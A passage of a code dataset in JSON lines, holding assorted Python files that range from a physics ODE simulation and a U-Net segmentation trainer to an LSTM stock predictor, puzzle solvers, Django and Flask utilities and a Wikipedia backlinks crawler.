experiencia del anfitrion: {experiencia.hostExperience}\")\n hostExperience = input(\"Nueva experiencia del anfitrion: \")\n else:\n hostExperience = experiencia.hostExperience\n\n update = int(input(\"¿Actualizar los elementos a necesitar? 0-No - 1-Yes: \"))\n if update == 1:\n print(f\"Antigüos elementos a necesitar: {experiencia.NeedElements}\")\n NeedElements = input(\"Nuevos elementos a necesitar: \")\n else:\n NeedElements = experiencia.NeedElements\n\n update = int(input(\"¿Actualizar el precio? 0-No - 1-Yes: \"))\n if update == 1:\n print(f\"Antigüo precio: {experiencia.precio}\")\n precio = round(float(input(\"Nuevo precio: \")),2)\n else:\n precio = experiencia.precio\n\n update = int(input(\"¿Actualizar fecha de la experiencia? 0-No - 1-Sí: \"))\n if update == 1:\n print(f\"Fecha de retirada Vieja: {experiencia.fecha}\")\n strfecha = input(\"Nueva Fecha (yyyy-mm-dd): \")\n strhora = input(\"Nueva hora (hh:mm:ss): \")\n strfechacompleta = strfecha+' '+strhora\n else:\n strfechacompleta = experiencia.fecha\n\n update = int(input(\"¿Actualizar temática? 
0-No - 1-Yes: \"))\n if update == 1:\n print(f\"id Antigüa temática: { experiencia.idTematic}\")\n ordenarTematica()\n idTematic = input(\"Nueva temática: \")\n else:\n idTematic = experiencia.idTematic\n\n self.dbexperiencia.updateExperienciaBD(id, host, ExperienceTitle, TypeExperience,\n Location, Descrption, Idiom, PublicObject, Organization, hostExperience, \n NeedElements, precio, strfechacompleta, idTematic)\n print(\"\\nLos cambios se han efectuado con éxito.\")\n\n\n #DELETACION\n def deleteOrganizarExperiencia(self):\n self.deleteExperiencia()\n\n def deleteExperiencia(self):\n print(\"Borrando experiencia...\")\n id = int(input(\"ID de la experiencia a eliminar: \"))\n\n self.dbexperiencia.deleteExperienciaDB(id)\n print(\"La experiencia se ha removido con éxito.\")\n\n #ORDENAR\n\n def ordenarTematica(self):\n result = self.dbtematica.getTematicas()\n\n table = PrettyTable()\n table.field_names = [\"IdTematica\", \"NombreTematica\", \"Descripcion\"]\n\n for tematica in result:\n table.add_row([\n tematica.id,\n tematica.tematicaname,\n tematica.description\n ])\n\n print(table)\n table.clear()","repo_name":"DAP-web/AirbnbProyect","sub_path":"Entrega Final/Views/View_OrdenarExperiencia.py","file_name":"View_OrdenarExperiencia.py","file_ext":"py","file_size_in_byte":10036,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"30265543070","text":"import numpy as np\nfrom scipy.integrate import solve_ivp\n\nimport matplotlib.pyplot as plt\n\n# Function to be integrated in the form of yprime = (f(t, y)\ndef equations(t, y):\n\n # Constants\n m = 70\n R0 = 6370000\n H = 8000\n\n # Calculate position-depenent gravity and height-dependent drag\n # coefficient.\n g = 9.81 / (1 + y[0] / R0)**2\n c2 = 0.5 * np.exp(-y[0] / H)\n\n # Drag force\n F_drag = -c2 * y[1] * np.abs(y[1])\n\n # dy/dt = V\n yprime = y[1]\n\n # Acceleration, dV/dt = Force / mass\n vprime = (-m*g + F_drag) / m\n\n # Return values\n return [yprime, vprime]\n\ndef events(t, y):\n return y[0] - 0\n\nevents.terminal = True\n\n# Set up initial conditions\ny0 = [32000, 0]\n\n# The variable tspan has the start and end times of the inegration which\n# teval is a vector of time points for the solution to be evaulated at.\ntspan = (0, 1200)\nteval = np.linspace(tspan[0], tspan[1], 1000)\n\n# Call the solver.\nsol = solve_ivp(equations, tspan, y0, t_eval = teval, events = events)\n\n# Extract the time and position/velocty vector from sol\nt = sol.t\ny = sol.y\n\n# Print the time to impact. 
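In the free_fall model above, gravity and quadratic drag balance at terminal velocity: m*g = c2*v^2, so v_t = sqrt(m*g/c2). A quick check with the script's own constants at sea level (m = 70, c2 = 0.5, g = 9.81):

import math

m, g, c2 = 70.0, 9.81, 0.5           # sea-level values from the model
v_terminal = math.sqrt(m * g / c2)   # drag c2*v^2 equals weight m*g
print(round(v_terminal, 1))          # ~37.1 m/s

At the 32 km starting altitude the exponential density factor exp(-y/H) shrinks c2 by exp(-4), roughly 55 times, which is why the early fall is far faster before the denser air below brakes it.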
This will be an empty vector if no event was\n# detected.\nprint('Time to impact = ', sol.t_events[-1]);\n\n\n# Plot the results\nplt.subplot(1, 2, 1); plt.plot(t, y[0, :], 'k')\nplt.xlabel('Time (s)'); plt.ylabel('Altitude (m)');\nplt.subplot(1, 2, 2); plt.plot(t, y[1, :], 'k')\nplt.xlabel('Time (s)'); plt.ylabel('Velocity (m/s)');\nplt.show()\n","repo_name":"kpmooney/numerical_methods_youtube","sub_path":"free_fall/free_fall.py","file_name":"free_fall.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":127,"dataset":"github-code","pt":"35"} +{"seq_id":"71668751461","text":"import json\n\nPOST_PATH = 'posts.json'\n\n\ndef load_posts():\n with open(POST_PATH, 'r', encoding='utf-8') as f:\n posts = json.load(f)\n return posts\n\n\ndef uploads_posts(post):\n posts = load_posts()\n posts.append(post)\n\n with open(POST_PATH, 'w', encoding='utf-8') as f:\n json.dump(posts, f, ensure_ascii=False, indent=4)\n\n\n","repo_name":"pryanikkun/hometask12","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"1554075641","text":"def get_area(vertex):\n unit = set()\n for i in vertex:\n x = range(i[0],i[2])\n y = range(i[1],i[3])\n for j in x:\n for k in y:\n unit.add((j,k))\n return unit \n\n\nT = []\nfor i in range(4):\n T.append(list(map(int,input().split())))\n\nans = get_area(T)\nprint(len(ans))","repo_name":"WoowonKim/APS","sub_path":"Previous_work/BJ2669.py","file_name":"BJ2669.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"70402887782","text":"import itertools\n\ntime_limit = 401\nplayer_dict = {}\nnum = 1\norder = []\n\nplayers = \"\"\"Person 1 will take 29 minutes to cross the bridge.\nPerson 2 will take 3 minutes to cross the bridge.\nPerson 3 will take 38 minutes to cross the bridge.\nPerson 4 will take 9 minutes to cross the bridge.\nPerson 5 will take 72 minutes to cross the bridge.\nPerson 6 will take 11 minutes to cross the bridge.\nPerson 7 will take 97 minutes to cross the bridge.\n\"\"\"\nplayers = players.split(\".\")\n\nfor player in players:\n player = player.split(\" \")\n if num < len(players):\n player_dict[int(player[1])] = int(player[4])\n num += 1\n\nfast_dict = dict(sorted(player_dict.items(), key=lambda item: item[1]))\nstart_dict = fast_dict\nend_dict = {}\ntwo_fastest = dict(itertools.islice(fast_dict.items(), 2))\n\n\ndef start_side():\n global start_dict\n global end_dict\n global order\n start_dict = dict(sorted(start_dict.items(), key=lambda item: item[1]))\n \n if len(start_dict) >= 2:\n # If two fastest people are present in starting side send them to far side\n if set(two_fastest.items()).issubset(set(start_dict.items())):\n # Remove two fastest people from start_dict\n start_dict.pop(list(two_fastest.keys())[0])\n start_dict.pop(list(two_fastest.keys())[1])\n # Add the two moved to end_dict\n end_dict.update(two_fastest)\n # Add the two people sent over to the order\n order.append(list(two_fastest.keys()))\n far_side()\n else:\n #Send the two slowest people\n slowest = dict(itertools.islice(start_dict.items(), len(start_dict) - 2, len(start_dict)))\n start_dict.pop(list(slowest.keys())[-1])\n start_dict.pop(list(slowest.keys())[-2])\n end_dict.update(slowest)\n order.append(list(slowest.keys()))\n\n far_side()\n\n \ndef far_side():\n global start_dict\n 
global end_dict\n global order\n if len(start_dict) > 0:\n end_dict = dict(sorted(end_dict.items(), key=lambda item: item[1]))\n fastest = dict(itertools.islice(end_dict.items(), 1))\n end_dict.pop(list(fastest.keys())[0])\n start_dict.update(fastest)\n order.append(list(fastest.keys()))\n\n start_side()\n\nstart_side()\n\n# print(start_dict)\n# print(end_dict)\n# print(order)\nprint(order)","repo_name":"MasonBrott/CTF","sub_path":"bridge_crossing.py","file_name":"bridge_crossing.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"13611747782","text":"#!/usr/bin/env python\nimport os\nimport sys\n\nimport django\nfrom django.conf import settings\nfrom django.test.utils import get_runner\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\n\ndef root(*x):\n return os.path.join(BASE_DIR, *x)\n\n\nif not settings.configured:\n settings.configure(\n DEBUG=True,\n DATABASES={\n \"default\": {\n \"ENGINE\": \"django.db.backends.sqlite3\",\n \"NAME\": \"test_db\",\n }\n },\n INSTALLED_APPS=(\n \"django.contrib.contenttypes\",\n \"django.contrib.staticfiles\",\n \"dc_utils\",\n \"test_project\",\n \"dc_signup_form\",\n ),\n ROOT_URLCONF=\"test_project.urls\",\n TEMPLATES=[\n {\n \"BACKEND\": \"django.template.backends.django.DjangoTemplates\",\n \"APP_DIRS\": True,\n \"DIRS\": [\n root(\"test_project/templates\"),\n ],\n \"OPTIONS\": {\n \"debug\": True,\n \"context_processors\": [\n \"dc_utils.context_processors.dc_django_utils\",\n \"dc_signup_form.context_processors.signup_form\",\n ],\n },\n }\n ],\n MIDDLEWARE=[\n \"django.contrib.sessions.middleware.SessionMiddleware\",\n \"django.contrib.messages.middleware.MessageMiddleware\",\n ],\n SECRET_KEY=\"testing_key\",\n )\n\ndjango.setup()\nTestRunner = get_runner(settings)\ntest_runner = TestRunner(verbosity=1, interactive=True, failfast=False)\nfailures = test_runner.run_tests(\n [\n \"dc_signup_form\",\n ]\n)\nsys.exit(failures)\n","repo_name":"DemocracyClub/dc_signup_form","sub_path":"run_tests.py","file_name":"run_tests.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"40898830626","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport numpy as np\nimport h5py\nimport math\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import LinearSegmentedColormap\nfrom sklearn.model_selection import KFold\nimport GeneratorSequence as gs\nimport saveloadmodel as slm\n\nfrom keras.callbacks import ModelCheckpoint, CSVLogger, Callback\nfrom keras.utils import to_categorical\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D, UpSampling2D, MaxPooling2D\nfrom keras.layers.core import Activation, Dense, Flatten\nfrom keras.optimizers import SGD\nfrom keras.models import load_model, save_model\nfrom keras.layers.convolutional import Conv1D, MaxPooling1D\nfrom keras.models import Model\nfrom keras.layers import Input, merge, ZeroPadding2D, concatenate, BatchNormalization\nfrom keras.layers.core import Dropout\nfrom keras import backend as K\nfrom keras.utils.generic_utils import get_custom_objects\nfrom keras.callbacks import CSVLogger\nimport tensorflow as tf\ntf.get_logger().setLevel('INFO')\n\n#%%\nh = 128\nw = 256\nhdf_data = h5py.File('..\\\\data\\\\HDF_' + str(h) + 'x' + str(w) + '_aug.h5', 'r')\n\ncategories = [[8]]\n\nn_classes = 17\nbatch_size = 64\nepochs = 6\n\n\n# a hirhedt Hargitai féle loss function, source: 
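The bridge_crossing script above prints the crossing order but never totals it against the 401-minute time_limit. A hedged scorer, assuming each entry of order lists the people moving in that crossing (pairs forward, singles returning) and that a group crosses at its slowest member's pace:

def total_time(order, times):
    # Every crossing, forward or return, costs the slowest member's time.
    return sum(max(times[p] for p in group) for group in order)

times = {1: 29, 2: 3, 3: 38, 4: 9, 5: 72, 6: 11, 7: 97}
# total_time(order, times) <= 401 confirms whether the produced plan fits.

The loop above alternates between escorting the two fastest forward, pairing the two slowest off together, and returning the single fastest, which is the standard greedy for this puzzle.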
https://towardsdatascience.com/metrics-to-evaluate-your-semantic-segmentation-model-6bcb99639aa2\ndef iou_loss(y_true, y_pred, smooth=1):\n intersection = K.sum(K.abs(y_true * y_pred), axis=[1, 2, 3])\n union = K.sum(y_true, [1, 2, 3])+K.sum(y_pred, [1, 2, 3])-intersection\n iou = K.mean((intersection + smooth) / (union + smooth), axis=0)\n return 1 - iou\nget_custom_objects().update({\"iou_loss\": iou_loss}) # defining new loss function for keras\n\n\n# creating an Unet\n# more about the network can be found in our documentation\n\n# TODO: zero padding?\n\ndef create_empty_unet(output_layers = 1):\n inputs = Input((h, w, 4))\n # encoder part\n conv1 = Conv2D(8, (3, 3), padding='same')(inputs)\n conv1 = BatchNormalization(axis=3, momentum=0.9)(conv1)\n conv1 = Activation('relu')(conv1)\n # maxpooling\n # dropout\n \n conv2 = Conv2D(16, (3, 3), padding='same', strides=2)(conv1)\n conv2 = BatchNormalization(axis=3, momentum=0.9)(conv2)\n conv2 = Activation('relu')(conv2)\n \n conv3 = Conv2D(32, (3, 3), padding='same', strides=2)(conv2)\n conv3 = BatchNormalization(axis=3, momentum=0.9)(conv3)\n conv3 = Activation('relu')(conv3)\n \n conv4 = Conv2D(64, (3, 3), padding='same', strides=2)(conv3)\n conv4 = BatchNormalization(axis=3, momentum=0.9)(conv4)\n conv4 = Activation('relu')(conv4)\n \n conv5 = Conv2D(128, (3, 3), padding='same', strides=2)(conv4)\n conv5 = BatchNormalization(axis=3, momentum=0.9)(conv5)\n conv5 = Activation('relu')(conv5)\n \n # decoder part\n concat1 = concatenate([UpSampling2D((2, 2))(conv5), conv4], axis=3)\n conv6 = Conv2D(64, (3, 3), padding='same')(concat1)\n conv6 = BatchNormalization(axis=3, momentum=0.9)(conv6)\n conv6 = Activation('relu')(conv6)\n \n concat2 = concatenate([UpSampling2D((2, 2))(conv6), conv3], axis=3)\n conv7 = Conv2D(32, (3, 3), padding='same')(concat2)\n conv7 = BatchNormalization(axis=3, momentum=0.9)(conv7)\n conv7 = Activation('relu')(conv7)\n \n concat3 = concatenate([UpSampling2D((2, 2))(conv7), conv2], axis=3)\n conv8 = Conv2D(16, (3, 3), padding='same')(concat3)\n conv8 = BatchNormalization(axis=3, momentum=0.9)(conv8)\n conv8 = Activation('relu')(conv8)\n \n concat4 = concatenate([UpSampling2D((2, 2))(conv8), conv1], axis=3)\n conv9 = Conv2D(8, (3, 3), padding='same')(concat4)\n conv9 = BatchNormalization(axis=3, momentum=0.9)(conv9)\n conv9 = Activation('relu')(conv9)\n \n output = Conv2D(output_layers, (1, 1), activation='sigmoid', padding='same')(conv9)\n \n unet = Model(inputs, output)\n \n # we used mean absolute error at the beginning\n unet.compile(optimizer='adam', loss=iou_loss)\n \n return unet\n\n\n# %%\n\nnp_train_valid_dataset = np.array(hdf_data['train_valid'], dtype=np.uint8)\n\nn_samples_list = list(range(hdf_data['train_valid'].shape[0]))\n\nkf = KFold(n_splits=5, shuffle=True)\n\nfor i in range(epochs):\n for cats in categories:\n model_name = 'NET_' + str(h) + 'x' + str(w) + '_cat%02d' % (cats[0])\n for i in range(1,len(cats)):\n model_name = model_name + '_%02d' % cats[i]\n log_path = '..\\\\logs\\\\' + model_name + '.csv'\n open(log_path, 'a+').close() # file letrehozasa ha nem letezne\n \n model = slm.load_last_model(model_name)\n if model == None:\n model = create_empty_unet(len(cats))\n model.summary()\n \n for train_index, valid_index in kf.split(n_samples_list):\n # train_gen = gs.GeneratorSequence(hdf_data['train_valid'], train_index, n_classes, batch_size = batch_size, categories = cats)\n # valid_gen = gs.GeneratorSequence(hdf_data['train_valid'], valid_index, n_classes, batch_size = batch_size, categories 
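A quick numeric check of the soft IoU loss above: with smooth=1 it is exactly 0 for a perfect mask (intersection equals union) and approaches 1 for disjoint masks. Assuming eager execution (TF 2.x), dummy tensors make this visible:

import numpy as np
import tensorflow as tf

ones = tf.constant(np.ones((1, 4, 4, 1), dtype=np.float32))
zeros = tf.constant(np.zeros((1, 4, 4, 1), dtype=np.float32))

print(float(iou_loss(ones, ones)))    # 0.0: (16+1)/(16+1) == 1
print(float(iou_loss(ones, zeros)))   # ~0.94: 1 - 1/17, nears 1 as masks grow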
= cats)\n \n train_gen = gs.GeneratorSequence(np_train_valid_dataset, train_index, n_classes, batch_size = batch_size, categories = cats)\n valid_gen = gs.GeneratorSequence(np_train_valid_dataset, valid_index, n_classes, batch_size = batch_size, categories = cats)\n \n model.fit(train_gen, validation_data = valid_gen, \\\n callbacks = [slm.CheckPointer(model_name), \\\n CSVLogger(log_path, append=True, separator=',')])\n \n \n# %%\ntestsize = 100\nteststart = 00*6+00\nlabellist = [[70, 70, 70], # Building 0\n [100, 40, 40], # Fence->other 1\n [220, 20, 60], # Pedestrian 2\n [153, 153, 153], # Pole 3\n [157, 234, 50], # RoadLine 4\n [128, 64, 128], # Road 5\n [244, 35, 232], # Sidewalk 6\n [107, 142, 35], # Vegetation 7\n [0, 0, 142], # Vehicles 8\n [102, 102, 156], # Wall 9\n [220, 220, 0], # TrafficSign 10\n [70, 130, 180], # Sky 11\n [81, 0, 81], # Ground 12\n [230, 150, 140], # Railtrack 13\n [250, 170, 30], # TrafficLight 14\n [110, 190, 160], # Static 15 -> 1\n [170, 120, 50], # Dinamic 16 -> 1\n [45, 60, 150], # Water 17 -> 15\n [145, 170, 100] # Terrain 18 -> 16\n ]\n\ntest_x = hdf_data['test'][teststart:teststart+testsize,:,:,0:4]\npreds = model.predict(test_x)\n\n\n# for i in range(testsize):\n# pred = preds[i]\n# predcolor = np.zeros([pred.shape[0],pred.shape[1],3], dtype=np.uint8)\n# for cindex, col in enumerate(pred):\n# for lindex, labl in enumerate(col):\n# predcolor[cindex,lindex,0] = labellist[np.argmax(labl)][0]\n# predcolor[cindex,lindex,1] = labellist[np.argmax(labl)][1]\n# predcolor[cindex,lindex,2] = labellist[np.argmax(labl)][2]\n# plt.figure()\n# plt.title(str(i))\n# plt.imshow(predcolor)\n\n\n# #%%\n# for i in range(19):\n# plt.figure()\n# plt.imshow(preds[0,:,:,i])\n# plt.title(str(i))\n \nfor i in range(testsize):\n plt.figure()\n plt.suptitle(i)\n plt.subplot(preds.shape[-1]+1,1,1)\n plt.imshow(test_x[i,:,:,0:3])\n for j in range(preds.shape[-1]):\n plt.subplot(preds.shape[-1]+1, 1, j+2)\n plt.imshow(preds[i,:,:,j])\n\n\n#%%\n# for i in range(hdf_data['train_valid'].shape[0]):\n# plt.figure()\n# plt.imshow(hdf_data['train_valid'][i,:,:,0:3])\n# plt.title(str(i))","repo_name":"hargitaibalint/SZGLR_HF","sub_path":"nn1_unet.py","file_name":"nn1_unet.py","file_ext":"py","file_size_in_byte":7627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71496179621","text":"from impo import impo\n\nimpo.imp_inst('pandas')\nimpo.imp_inst('scikit-learn')\nimpo.imp_inst('numpy')\nimpo.imp_inst('tensorflow')\nimpo.imp_inst('keras')\nimpo.imp_inst('matplotlib')\nimpo.imp_inst('plotly')\n\nimport pandas as pd\nfrom datetime import date\nfrom sklearn.preprocessing import StandardScaler\nfrom tensorflow.keras.callbacks import EarlyStopping\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.models import load_model\nfrom keras.models import Sequential\nfrom keras.layers import Dense, LSTM, Dropout\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nimport plotly.graph_objs as go\n\n\nclass lstm():\n def __init__(self, ticker: str):\n self.ticker = ticker\n self.data = None\n self.data_original = None\n self.new_data = None\n self.dat_orig_final = None\n self.X = None\n self.y = None\n self.split_idx = None\n self.model = None\n self.x_pred = None\n self.y_pred = None\n self.new_pred = None\n self.preds_train = None\n self.preds_test = None\n self.new_preds = None\n\n def get_data(self):\n ## Call function to get data in csv\n self.data = self.function(self.ticker)\n 
self.data_original = self.data.copy()\n\n def preprocess(self):\n # Preprocess date column\n if self.data is None:\n self.get_data()\n\n self.data['Date'] = pd.to_datetime(self.data['date'])\n self.data.drop(['date'], axis=1, inplace=True)\n\n self.data['Year'] = self.data['Date'].dt.year\n self.data['Month'] = self.data['Date'].dt.month\n self.data['Day'] = self.data['Date'].dt.day\n\n self.data = pd.get_dummies(self.data, columns=['Month']) # one-hot encode month column\n\n # set the 'date' column as the DataFrame's index\n self.data.set_index('Date', inplace=True)\n\n # lag the 'close_price' column by three months\n self.data['close_price_lagged'] = self.data['close'].shift(6*30)\n\n # reset the index back to a column\n self.data.reset_index(inplace=True)\n\n # create new data as last three months of data\n self.new_data = self.data[self.data['close_price_lagged'].isna()==True].copy().drop(['close_price_lagged'], axis=1)\n self.data_orig_final = self.data.copy()\n self.data = self.data[self.data['close_price_lagged'].isna()==False].copy()\n\n self.data = self.data.drop('Date', axis=1)\n\n # scale data\n scaler = StandardScaler()\n self.data.iloc[:, 1:28] = scaler.fit_transform(self.data.iloc[:, 1:28]) # standardize year and day columns\n self.new_data.iloc[:, 1:28] = scaler.fit_transform(self.new_data.iloc[:, 1:28])\n\n self.X = self.data.drop('close_price_lagged', axis=1).values\n self.y = self.data['close_price_lagged'].values.reshape(-1, 1)\n\n # reshape for LSTM\n self.X = self.X.reshape(self.X.shape[0], 1, self.X.shape[1]) # reshape to 3D array\n\n def train_lstm(self, idx=0.8):\n if self.X is None:\n self.preprocess()\n\n # Split the data into training and testing sets\n self.split_idx = int(len(self.X) * idx)\n X_train, X_test = self.X[:self.split_idx], self.X[self.split_idx:]\n y_train, y_test = self.y[:self.split_idx], self.y[self.split_idx:]\n\n # Define the LSTM model\n model = Sequential()\n model.add(LSTM(50, activation='relu', return_sequences=True, input_shape=(1, self.X.shape[2])))\n for n in range(5):\n model.add(LSTM(20, activation='relu', return_sequences=True))\n model.add(LSTM(20, activation='relu', return_sequences=False))\n model.add(Dropout(0.1))\n model.add(Dense(20, activation='relu'))\n model.add(Dense(1))\n\n # Compile the model with an appropriate learning rate and metric\n opt = Adam(learning_rate=0.01)\n model.compile(optimizer=opt, loss='mean_absolute_error', metrics=['mae'])\n\n # Define early stopping criteria\n early_stopping = EarlyStopping(monitor='val_loss', patience=200)\n\n # Train the model with early stopping\n history = model.fit(X_train, y_train, epochs=2000, verbose=1, validation_data=(X_test, y_test), callbacks=[early_stopping])\n\n # Use the best model for predictions\n y_pred = model.predict(X_test)\n x_pred = model.predict(X_train)\n\n # Calculate the MAE\n mae = np.mean(np.abs(y_pred - y_test))\n\n # Print the MAE\n print(\"MAE: \", mae)\n\n self.x_pred = [x[0] for x in x_pred]\n self.y_pred = [x[0] for x in y_pred]\n\n # Save the model\n model.save(f\"best_model_{self.ticker}.h5\")\n self.model = load_model(f\"best_model_{self.ticker}.h5\")\n\n\n def plot_train(self):\n if self.model is None:\n self.train_lstm()\n \n self.preds_train = pd.DataFrame({\n 'Date': self.data_orig_final['Date'][:self.split_idx],\n 'Predictions': self.split_idxx_pred,\n 'Observed': self.data_orig_final['close_price_lagged'][:self.split_idx]\n })\n\n self.preds_train.to_csv('train_pred.csv')\n\n fig, ax = plt.subplots(figsize=(12,8))\n plt.title('Train 
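Two caveats in the lstm class above. In preprocess, StandardScaler.fit_transform is refit separately on the historical frame and on new_data, so the two are standardized against different statistics, and because it runs before the train/test split, test rows leak into the training-set scaling. The leak-free pattern fits on training rows only and reuses those statistics everywhere; a minimal sketch (train_df, test_df, new_df, and feature_cols are placeholders for the slices used above):

from sklearn.preprocessing import StandardScaler

scaler = StandardScaler()
# Fit on the training slice only...
train_scaled = scaler.fit_transform(train_df[feature_cols])
# ...then reuse the same mean/variance for held-out and future rows.
test_scaled = scaler.transform(test_df[feature_cols])
new_scaled = scaler.transform(new_df[feature_cols])

Separately, plot_train references self.split_idxx_pred, which reads like a mangled self.x_pred and would raise AttributeError as written.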
Predictions')\n ax.plot('Date', 'Predictions', data=self.preds_train, label='Predictions')\n ax.plot('Date', 'Observed', data=self.preds_train, label='Observed', linewidth=0.5) # set alpha to 0.5 for the Observed line\n plt.xticks(rotation=60)\n ax.xaxis.set_major_locator(mdates.WeekdayLocator(interval=3))\n ax.legend()\n plt.show()\n\n def plot_test(self):\n if self.model is None:\n self.train_lstm()\n\n self.preds_test = pd.DataFrame({\n 'Date': self.data_orig_final['Date'][self.split_idx:],\n 'Predictions': self.y_pred,\n 'Observed': self.data_orig_final['close_price_lagged'][self.split_idx:]\n })\n\n self.preds_test.to_csv('test_pred.csv')\n\n fig, ax = plt.subplots(figsize=(12,8))\n plt.title('Test Predictions')\n ax.plot('Date', 'Predictions', data=self.preds_test, label='Predictions')\n ax.plot('Date', 'Observed', data=self.preds_test, label='Observed', linewidth=0.5) # set alpha to 0.5 for the Observed line\n plt.xticks(rotation=60)\n ax.xaxis.set_major_locator(mdates.WeekdayLocator(interval=1))\n ax.legend()\n plt.show()\n\n def predict(self):\n if self.model is None:\n try:\n self.model = load_model(f\"best_model_{self.ticker}.h5\")\n except Exception:\n self.train_lstm()\n\n #Reshape X to match LSTM input shape\n self.new_data = self.new_data.reshape((self.new_data.shape[0], 1, self.new_data.shape[1]))\n self.new_pred = self.model.predict(self.new_data)\n self.new_pred = [x[0] for x in self.new_pred]\n\n def plot_preds(self):\n if self.new_pred is None:\n self.predict()\n\n self.new_preds = pd.DataFrame({\n 'Date': self.new_data['Date'],\n 'Predictions': self.new_pred\n })\n\n self.new_preds.to_csv(f'new_preds_{self.ticker}.csv')\n\n fig, ax = plt.subplots(figsize=(12,8))\n plt.title('Next 6 Months Predictions')\n ax.plot('Date', 'Predictions', data=self.new_preds, label='Predictions')\n plt.xticks(rotation=60)\n ax.xaxis.set_major_locator(mdates.WeekdayLocator(interval=1))\n ax.legend()\n plt.show()\n\n def plot_all(self):\n if self.new_pred is None:\n self.predict()\n\n date_new = pd.concat([self.data_orig_final['Date'], self.new_data['close_price_lagged']], axis=0)\n len_zeros = int(len(date_new)-len(self.data_orig_final['close_price_lagged']))\n observed_new = pd.concat([self.data_orig_final['close_price_lagged'], pd.Series(np.zeros(len_zeros))], axis=0)\n predictions_new = pd.concat([self.preds_train['Predictions'], self.preds_test['Predictions'], self.new_preds['Predictions']])\n\n predictions_concat = pd.DataFrame({\n 'Date': date_new,\n 'Observed': observed_new,\n 'Predictions': predictions_new\n })\n\n\n # Create a trace for the observed values\n trace_observed = go.Scatter(x=predictions_concat['Date'], y=predictions_concat['Observed'], name='Observed')\n\n # Create a trace for the predictions\n trace_predictions = go.Scatter(x=predictions_concat['Date'], y=predictions_concat['Predictions'], name='Predictions')\n\n # Create a layout for the graph\n layout = go.Layout(\n title='Next 6 Months Predictions',\n xaxis=dict(title='Date', tickangle=60),\n yaxis=dict(title='Values'),\n )\n\n # Create a figure and add the traces and layout\n fig = go.Figure(data=[trace_observed, trace_predictions], layout=layout)\n\n # Show the graph\n fig.show()","repo_name":"yaoyzz/Finance-LLM","sub_path":"lstm/.ipynb_checkpoints/lstm-checkpoint.py","file_name":"lstm-checkpoint.py","file_ext":"py","file_size_in_byte":8937,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"33327857906","text":"from timing import timing_function\nfrom 
arithmetic import primes, isPrime\n\nprimes = primes(1000) \nwhile primes[0] <= 40:\n primes.pop(0)\n\nprimes.extend([-p for p in primes])\n\ndef quadratic(a : int , b : int , n : int):\n return n**2 + a*n + b\n\ndef consecutive(a : int , b : int):\n n = 0\n while isPrime(quadratic(a, b, n)):\n n +=1\n return n\n\ndef euler_27():\n maxConsecutive = -1\n for a in range(-999, 1000):\n for b in primes:\n aux = consecutive(a, b)\n if aux > maxConsecutive:\n maxA, maxB, maxConsecutive = a, b, aux\n return maxA * maxB\n# return (maxA, maxB, maxA * maxB, maxConsecutive)\n\n\ndef main():\n print(timing_function(euler_27))\n\nmain()\n\n","repo_name":"dbirmajer/Project-Euler","sub_path":"euler_27.py","file_name":"euler_27.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"22948926110","text":"from django.contrib.postgres.operations import CreateExtension, HStoreExtension, TrigramExtension, UnaccentExtension\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n run_before = [\n ('geo', '0001_initial'),\n ]\n\n operations = [\n HStoreExtension(),\n UnaccentExtension(),\n TrigramExtension(),\n CreateExtension('postgis'),\n ]\n","repo_name":"marcodelmoral/sis_prototipo","sub_path":"sis_prototipo/apps/geo/migrations/install_extensions.py","file_name":"install_extensions.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30116285821","text":"from flask_restplus import reqparse\n\nupdate_shoppinglist_parser = reqparse.RequestParser()\nupdate_shoppinglist_parser.add_argument('name', type=str,\n help='New Shoppinglist Name')\nupdate_shoppinglist_parser.add_argument('description', type=str,\n help='Shoppinglist description should not be blank')\n\nupdate_item_parser = reqparse.RequestParser()\nupdate_item_parser.add_argument('name', type=str, required=True, help='Item name should be provided')\nupdate_item_parser.add_argument('price', required=True, help='Item price should be provided')\nupdate_item_parser.add_argument('quantity', required=True, help='Item quantity should be provided')\nupdate_item_parser.add_argument('unit', required=True, help='enter a unit of measurement')\n","repo_name":"sgatana/my-shopping-tracker","sub_path":"app/api/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36003423357","text":"import sys\n\nimport requests\n\n\ndef loose_starting_title(title, cont=None):\n url = 'https://en.wikipedia.org/w/api.php?action=query&list=backlinks&format=json&bltitle='+title+'&bllimit=max'\n if cont:\n url += \"&blcontinue=%s\" % cont\n r = requests.get(url)\n backlinks = r.json()\n for link in backlinks['query']['backlinks']:\n yield link['title']\n if \"continue\" in backlinks:\n for link in loose_starting_title(title, cont=backlinks['continue']['blcontinue']):\n yield link\n \nseen_pages = set()\n\ndef store_backlink_value(title, rest_of_chain=()):\n rest_of_chain = rest_of_chain\n for link in loose_starting_title(title):\n if link not in seen_pages:\n yield link, 